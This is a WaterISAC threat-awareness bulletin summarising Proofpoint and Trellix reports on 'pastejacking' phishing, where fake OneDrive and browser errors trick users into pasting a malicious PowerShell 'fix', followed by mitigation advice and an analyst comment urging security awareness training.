You are here

Threat Awareness – Another PowerShell “fix” Compromise via the Clipboard

Threat Awareness – Another PowerShell “fix” Compromise via the Clipboard

Created: Tuesday, July 30, 2024 - 15:03
Categories:
Cybersecurity

In the Security & Resilience Update on June 18, 2024, WaterISAC shared research from Proofpoint on increased activity it has observed leveraging unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect computers with malware. The previously shared campaign uses fake Google Chrome, Word, and OneDrive errors to trick users into clicking a button to copy a PowerShell "fix" into the clipboard and when subsequently pasted installs malware. While the tactic involves significant user interaction, it’s believed that the social engineering ploy of a reputable site/service offering a “fix” may prompt a user to take action without considering the risk.

Over the past few weeks, the Trellix Advanced Research Center observed an extremely similar phishing campaign targeting Microsoft OneDrive users. According to Trellix, users are tricked into clicking a button that purportedly explains how to fix a DNS issue, ostensibly to grant access to a file on Microsoft OneDrive. Upon clicking the button, the series of actions leads the user through the same hoops described by Proofpoint, including leveraging the clipboard to copy/paste the malicious PowerShell script to “fix” the issue. Trellix has dubbed this technique “pastejacking.” For more details, visit Trellix.

Whether a clipboard-based attack is subtle or appears more technical in nature such as the PowerShell examples, it’s practical to make users aware of some of these lesser-known attack tactics. Additionally, the following can help mitigate clipboard-based attacks:

  • Keep the clipboard clear. Regularly clear clipboard contents, especially after copying sensitive information.
  • Endpoint protections. Many reputable security solutions include features to detect and prevent malicious attempts to access or modify clipboard contents.
  • Right-size account access. Apply the principle of least privilege and restrict non-administrative users from executing PowerShell.

Analyst comment (Jennifer Lyn Walker): Full disclosure, after looking into this and the previous analysis, I realized that Proofpoint also described the same “fix the DNS” lure as one of multiple fake errors in its analysis report. That said, given the social engineering component and sense of urgency and “technical” foolery this activity is using, I felt it was useful to emphasize this tactic and encourage members to incorporate this into security awareness training.